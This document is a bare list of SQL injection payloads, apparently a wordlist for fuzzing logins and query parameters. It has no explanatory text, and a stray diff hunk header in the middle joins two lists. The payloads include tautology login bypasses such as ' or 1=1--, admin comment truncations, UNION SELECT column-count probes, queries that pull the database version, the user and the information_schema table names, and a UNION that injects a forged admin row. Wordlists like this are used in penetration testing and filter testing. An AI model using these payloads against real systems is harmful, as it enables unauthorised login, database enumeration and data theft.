"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
